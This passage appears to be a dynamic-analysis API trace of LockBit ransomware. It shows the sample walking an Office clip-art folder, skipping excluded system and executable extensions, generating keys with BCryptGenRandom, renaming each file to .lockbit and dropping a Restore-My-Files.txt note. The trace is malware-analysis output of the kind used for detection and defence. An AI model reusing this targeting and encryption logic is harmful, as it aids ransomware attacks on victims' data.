lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.195] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.195] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.195] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.195] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.196] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.196] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG.lockbit") returned 72 [0124.196] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099189.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.200] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.200] malloc (_Size=0x40068) returned 0x3df0008 [0124.200] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8076) returned 1 [0124.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.201] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.205] malloc (_Size=0xa6) returned 0x77d7a8 [0124.205] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.206] free (_Block=0x77d7a8) [0124.206] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099189.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.206] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.206] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x562fb9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xab74, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099190.JPG", cAlternateFileName="")) returned 1 [0124.206] lstrcmpiW (lpString1=".", lpString2="J0099190.JPG") returned -1 [0124.206] lstrcmpiW (lpString1="..", lpString2="J0099190.JPG") returned -1 [0124.206] PathFindExtensionW (pszPath="J0099190.JPG") returned=".JPG" [0124.206] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.206] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.207] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.207] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.208] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.208] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099190.JPG") returned 1 [0124.208] lstrcmpiW (lpString1="ntldr", lpString2="J0099190.JPG") returned 1 [0124.208] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099190.JPG") returned 1 [0124.208] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099190.JPG") returned -1 [0124.208] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099190.JPG") returned -1 [0124.208] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099190.JPG") returned 1 [0124.208] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099190.JPG") returned -1 [0124.209] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.209] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG") returned=".JPG" [0124.209] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.209] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.209] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.210] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.210] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.210] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.210] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.210] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG.lockbit") returned 72 [0124.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099190.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0124.213] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.214] malloc (_Size=0x40068) returned 0x1ff1e60 [0124.214] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=43892) returned 1 [0124.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0124.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0124.215] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.217] malloc (_Size=0xa6) returned 0x77d7a8 [0124.217] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.218] free (_Block=0x77d7a8) [0124.218] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099190.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.218] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.218] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0xf39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099191.JPG", cAlternateFileName="")) returned 1 [0124.218] lstrcmpiW (lpString1=".", lpString2="J0099191.JPG") returned -1 [0124.218] lstrcmpiW (lpString1="..", lpString2="J0099191.JPG") returned -1 [0124.218] PathFindExtensionW (pszPath="J0099191.JPG") returned=".JPG" [0124.218] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0124.218] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.219] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0124.219] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0124.220] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0124.220] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099191.JPG") returned 1 [0124.220] lstrcmpiW (lpString1="ntldr", lpString2="J0099191.JPG") returned 1 [0124.220] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099191.JPG") returned 1 [0124.220] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099191.JPG") returned -1 [0124.220] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099191.JPG") returned -1 [0124.220] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099191.JPG") returned 1 [0124.221] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099191.JPG") returned -1 [0124.221] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.221] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG") returned=".JPG" [0124.221] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0124.221] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0124.221] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0124.222] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0124.222] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0124.222] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0124.222] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0124.222] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0124.222] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG.lockbit") returned 72 [0124.222] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099191.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0124.222] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.222] malloc (_Size=0x40068) returned 0x3d70450 [0124.222] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=62367) returned 1 [0124.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0124.223] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.223] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.223] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0124.223] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0124.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.227] malloc (_Size=0xa6) returned 0x77d7a8 [0124.227] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.227] free (_Block=0x77d7a8) [0124.228] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099191.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.228] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.228] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.228] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x462c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099192.GIF", cAlternateFileName="")) returned 1 [0124.228] lstrcmpiW (lpString1=".", lpString2="J0099192.GIF") returned -1 [0124.228] lstrcmpiW (lpString1="..", lpString2="J0099192.GIF") returned -1 [0124.228] PathFindExtensionW (pszPath="J0099192.GIF") returned=".GIF" [0124.228] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.228] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.228] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.228] 